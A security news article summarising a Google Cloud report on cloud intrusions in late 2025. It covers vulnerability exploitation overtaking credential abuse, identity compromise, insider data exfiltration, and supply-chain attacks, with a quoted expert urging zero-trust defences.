Cloud Security Threats Shift from Credential Abuse to Software Vulnerabilities

Post Views: 8

Cloud Intrusions Shift Toward Software Vulnerabilities and Identity Compromise

A recent report from Google Cloud highlights a significant shift in the tactics used by attackers to gain access to cloud and SaaS environments. The report, which covers incident response and intelligence findings from the second half of 2025, reveals that unpatched software vulnerabilities have become the primary initial access path, overtaking weak or absent credentials.

According to the report, attackers are increasingly targeting externally exposed applications and exploiting known vulnerabilities with limited interaction. Remote code execution has become a significant portion of this software-driven access, reflecting the automated exploitation of application-layer flaws and internet-facing services. The window between vulnerability disclosure and mass exploitation has collapsed from weeks to days, with threat actors deploying cryptocurrency miners within approximately 48 hours of public disclosure.

While credential abuse remains common, the leading position of software exploitation highlights the importance of application security, patch cycles, and hardening of public services. Matt Saunders, VP DevOps at Adaptavist, notes that the increased use of AI-based attacks is a major contributor to this trend.

“Rogue organizations are using tools to find and exploit weaknesses in critical, often open-source software on which all modern stacks are built, and AI is now a huge part of that.”

Identity Compromise and Malicious Insiders

Identity compromise continues to underpin most intrusions involving cloud and SaaS environments. Threat actors are using social engineering and stolen authentication material to move through trusted access channels. Voice-based phishing has played a central role, with attackers impersonating internal staff and support personnel to pressure help desks and users into resetting credentials and altering MFA settings. Token theft has also featured prominently, with compromised OAuth tokens and other authentication artifacts enabling access without traditional login phishing.

Malicious insiders are also shifting their focus toward cloud storage, with data exfiltration becoming the dominant form of misconduct. Reviews of malicious insider cases show that cloud services are playing a growing role in how insiders remove information. Corporate cloud environments and personally controlled cloud storage have become common destinations for sensitive data.

Notable Examples and Emerging Threats

In a notable example, North Korean actors used a trojanized application to gain a foothold on a developer workstation and leveraged authenticated sessions and available credentials to pivot into cloud resources. The attackers modified Kubernetes deployment configurations to execute attacker-controlled commands and stole high-privilege service account tokens to escalate privileges and move laterally into sensitive systems.

The report also highlights the increasing use of AI-driven supply chain techniques, where compromised Node Package Manager packages are used to harvest environment data and authentication tokens from developer workstations. Stolen GitHub personal access tokens have enabled unauthorized access to source code repositories, and overly permissive cloud roles have allowed the deployment of new infrastructure and the creation of administrative privileges.

Saunders notes that defensive posture needs to adjust to address these emerging threats. “To fight against this, organizations need to keep up with these techniques, and also limit the blast radius of any potential attack. Zero-trust security approaches are more important than ever, making sure that systems that could be used as a transport for an attack are running with the fewest privileges they need. A robust incident management process to address potential threats and real attacks is also critical.”

The report emphasizes the need for organizations to prioritize application security, patch cycles, and hardening of public services. As Saunders concludes, “The pressure to deliver software faster and safer never stops, and everyone needs to step up on automating governance to catch changes, including weaknesses, potential attack routes, and actual hackers trying to get in. Just bolting this over the top isn’t enough anymore; it needs to be standard practice for everyone.”